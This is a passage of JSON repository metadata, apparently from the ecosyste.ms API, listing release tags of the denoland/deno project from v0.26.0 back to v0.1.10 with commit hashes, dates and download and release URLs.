ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.26.0/manifests"},{"name":"v0.25.0","sha":"2cd22b5437a375f0e33f26327101afb818a03802","kind":"commit","published_at":"2019-11-26T18:01:59.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.25.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.25.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.25.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.25.0/manifests"},{"name":"v0.24.0","sha":"0fffef8e5afed754358efc5b41d93549592cd941","kind":"commit","published_at":"2019-11-15T03:52:58.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.24.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.24.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.24.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.24.0/manifests"},{"name":"v0.23.0","sha":"a611788834e40153ef27c8f1d6b7fd52c8a016b1","kind":"tag","published_at":"2019-11-05T02:50:15.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.23.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.23.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.23.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.23.0/manifests"},{"name":"v0.22.0","sha":"71efe6f2c530d1cb9e8a2679f5778e2c034a9d0d","kind":"commit","published_at":"2019-10-28T18:12:12.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.22.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.22.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.22.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.22.0/manifests"},{"name":"v0.21.0","sha":"4e88ba9a114279b3969d5ccca1cca0f74c8fc1fd","kind":"commit","published_at":"2019-10-19T22:46:02.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.21.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.21.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.21.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.21.0/manifests"},{"name":"v0.20.0","sha":"a4b27db21a10f9913460c054c98fce59f3dd157d","kind":"commit","published_at":"2019-10-07T16:57:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.20.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.20.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.20.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.20.0/manifests"},{"name":"v0.19.0","sha":"3892cf59018acd71dd4bc1099d747bd683cd4118","kind":"commit","published_at":"2019-09-25T14:58:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.19.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.19.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.19.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.19.0/manifests"},{"name":"v0.18.0","sha":"7e3296dad92cee2e8b77baedfbeca38aa297928e","kind":"commit","published_at":"2019-09-13T20:40:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.18.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.18.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.18.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.18.0/manifests"},{"name":"v0.17.0","sha":"82588ec09c199683cff88097e1b90649497239c7","kind":"commit","published_at":"2019-09-04T21:15:32.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.17.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.17.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.17.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.17.0/manifests"},{"name":"v0.16.0","sha":"0809b06a3938868f364f1343b0de4d5d9686495d","kind":"tag","published_at":"2019-08-22T22:12:26.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.16.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.16.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.16.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.16.0/manifests"},{"name":"v0.15.0","sha":"58f0e9b9b1b53ca486ef38ae662b98cbde839248","kind":"commit","published_at":"2019-08-13T22:35:04.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.15.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.15.0/manifests"},{"name":"v0.14.0","sha":"83d5362f1d7d8589b862de57912135067a8278c7","kind":"tag","published_at":"2019-08-09T01:48:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.14.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.14.0/manifests"},{"name":"v0.13.0","sha":"b3541c38f5672ffb4a29d66dca19d88b9ecae478","kind":"commit","published_at":"2019-07-31T19:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.13.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.13.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.13.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.13.0/manifests"},{"name":"v0.12.0","sha":"4e248ecda9bb31478c6db7f5e76fa12b64b516a9","kind":"tag","published_at":"2019-07-16T20:09:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.12.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.12.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.12.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.12.0/manifests"},{"name":"v0.11.0","sha":"92ac616708cb067a1b895283913c5ecd25c6d873","kind":"tag","published_at":"2019-07-07T16:19:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.11.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.11.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.11.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.11.0/manifests"},{"name":"v0.10.0","sha":"c56df45355c8e68eabbfa62021e7ca7484115c0b","kind":"tag","published_at":"2019-06-25T14:11:43.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.10.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.10.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.10.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.10.0/manifests"},{"name":"v0.9.0","sha":"7b06aa37342c021f9f1fac99125847d134e67001","kind":"commit","published_at":"2019-06-15T16:04:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.9.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.9.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.9.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.9.0/manifests"},{"name":"v0.8.0","sha":"d60bdb6350f2583e35d020f6cebb6aa30262fbcc","kind":"commit","published_at":"2019-06-08T19:16:34.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.8.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.8.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.8.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.8.0/manifests"},{"name":"v0.7.0","sha":"5265bd7cb1f86af99b01d73c537d52a50df95fe2","kind":"commit","published_at":"2019-05-29T22:42:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.7.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.7.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.7.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.7.0/manifests"},{"name":"v0.6.0","sha":"22feb74ba12215597416b5531f8a557302283e79","kind":"commit","published_at":"2019-05-20T19:22:08.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.6.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.6.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.6.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.6.0/manifests"},{"name":"v0.5.0","sha":"23aca36d52220efbfbc07abbe165bd2c9ade2009","kind":"commit","published_at":"2019-05-11T21:19:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.5.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.5.0/manifests"},{"name":"v0.4.0","sha":"2aae09c2b869bf5d0bc5fd269464e8ac504528ea","kind":"commit","published_at":"2019-05-03T23:33:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.4.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.4.0/manifests"},{"name":"v0.3.11","sha":"3b1e2f1ad42cfebb6f2568e54c82c5ac3c8fe3d4","kind":"commit","published_at":"2019-05-03T22:05:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.11/manifests"},{"name":"v0.3.10","sha":"40d8ef1ec9f5e50017c41af8bf3b9f8454f97544","kind":"tag","published_at":"2019-04-25T20:00:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.10/manifests"},{"name":"v0.3.9","sha":"e725b26b289fbe96b679039ba4203f10f7229ab9","kind":"tag","published_at":"2019-04-25T15:46:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.9/manifests"},{"name":"v0.3.8","sha":"0796a8f2f75005df95ef6115a4bdf6dd66e58dc3","kind":"commit","published_at":"2019-04-19T15:41:13.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.8/manifests"},{"name":"v0.3.7","sha":"8584d80cfd26111825af5a69fc6ae4c367ad0700","kind":"commit","published_at":"2019-04-11T19:35:21.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.7/manifests"},{"name":"v0.3.6","sha":"744e56cb58f90acde7baf8811676021fb55b2f2a","kind":"tag","published_at":"2019-04-04T14:04:28.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.6/manifests"},{"name":"v0.3.5","sha":"b965c7ab367a417fb7bdde2eaf38312179e5c183","kind":"commit","published_at":"2019-03-28T20:58:17.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.5/manifests"},{"name":"v0.3.4","sha":"223a2adbb46cb33e75ffe861ecaff6ff7e6d555e","kind":"commit","published_at":"2019-03-20T22:54:47.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.4/manifests"},{"name":"v0.3.3","sha":"3dbb06e699398549e8cfabc896ef3256ab433cba","kind":"tag","published_at":"2019-03-13T18:16:35.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.3/manifests"},{"name":"v0.3.2","sha":"535037b519711d238dc0bfa2c4d2ffb4b17dec53","kind":"commit","published_at":"2019-03-07T02:22:48.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.2/manifests"},{"name":"v0.3.1","sha":"b0c7b54f692ecc866d4f70bfa384631523bbf924","kind":"commit","published_at":"2019-02-27T21:20:10.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.1/manifests"},{"name":"v0.3.0","sha":"a5720d9e28f7ee5868049504816405392c2821d7","kind":"commit","published_at":"2019-02-19T04:22:41.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.3.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.3.0/manifests"},{"name":"v0.2.11","sha":"b2fb8261e700c75cfb9a626ae57bbd3098e08454","kind":"commit","published_at":"2019-02-09T04:34:05.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.11/manifests"},{"name":"v0.2.10","sha":"c3241822522fb2b13792fe5666596888057cf829","kind":"commit","published_at":"2019-02-02T23:26:31.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.10","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.10/manifests"},{"name":"v0.2.9","sha":"1681bda14d1552860645e40f91f667accefe50cb","kind":"commit","published_at":"2019-01-30T03:57:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.9","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.9/manifests"},{"name":"v0.2.8","sha":"a47d545e4d0831713d0107e86cead7b4506a9bf6","kind":"commit","published_at":"2019-01-19T16:54:45.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.8","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.8/manifests"},{"name":"v0.2.7","sha":"eb4a19ef6ef1c5ae797fb515c45627deca65cf31","kind":"commit","published_at":"2019-01-15T01:25:57.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.7","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.7/manifests"},{"name":"v0.2.6","sha":"404e6f86345216c9205cabb88b19eaca762095e0","kind":"commit","published_at":"2019-01-07T22:33:06.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.6","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.6/manifests"},{"name":"v0.2.5","sha":"320577c131c8058ba0065f26119ce1ce18bc23d2","kind":"commit","published_at":"2019-01-01T19:30:23.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.5","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.5/manifests"},{"name":"v0.2.4","sha":"c6e2fffc1388cdb4411d6c2cff36c4febb7c75d5","kind":"commit","published_at":"2018-12-24T04:39:11.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.4","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.4/manifests"},{"name":"v0.2.3","sha":"c69d2f554d05ba9e4d09af6ae451ce5676876e61","kind":"commit","published_at":"2018-12-14T20:11:44.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.3","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.3/manifests"},{"name":"v0.2.2","sha":"e6121762f8bf3c531c4c60229ff4a156ae21d931","kind":"commit","published_at":"2018-12-07T22:44:49.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.2","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.2/manifests"},{"name":"v0.2.1","sha":"b5c6bfa0c8a3df9598211bc68db5408f5eec147d","kind":"commit","published_at":"2018-12-01T00:28:27.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.1","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.1/manifests"},{"name":"v0.2.0","sha":"d083f7271b11d87ddba90869d2bcd2cf312e77af","kind":"commit","published_at":"2018-11-16T05:23:50.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.2.0","html_url":"https://github.com/denoland/deno/releases/tag/v0.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.2.0/manifests"},{"name":"v0.1.12","sha":"0c740ff85d855177d1619276154f63a36ed31557","kind":"commit","published_at":"2018-11-12T17:16:00.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.12","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.12/manifests"},{"name":"v0.1.11","sha":"e1d5f82d36f08b9c7a7c6233b7ce354a5cf82836","kind":"commit","published_at":"2018-11-05T22:51:29.000Z","download_url":"https://codeload.github.com/denoland/deno/tar.gz/v0.1.11","html_url":"https://github.com/denoland/deno/releases/tag/v0.1.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/denoland/deno@v0.1.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/denoland%2Fdeno/tags/v0.1.11/manifests"},{"name":"v0.1.10","sha":"da959e8c878382ce3